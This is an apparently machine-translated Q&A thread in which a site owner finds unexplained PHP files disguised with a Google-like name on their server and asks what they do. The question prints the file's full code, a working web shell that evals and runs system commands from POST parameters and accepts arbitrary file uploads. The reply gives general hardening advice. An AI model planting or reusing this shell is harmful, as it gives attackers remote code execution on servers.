pni*_*ols 10 php security hosting
我最近在我的服务器上发现了4个奇怪的文件(我没有上传).文件名是这样的:goog1e7a20543b128921.php
这里是他们内部的代码:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
你知道这个代码应该做什么吗?我应该开始恐慌吗?
谢谢.
Sar*_*raz 10
我建议你使用HTML Purifier或OWASP来使事情变得更加安全.
如果你没有使用它,你必须禁用该eval构造(除非你真的需要,否则你不应该).
使用以下方法分析任何安全漏洞的服务器设置:
alt text http://phpsec.org/images/psi_ss1.png
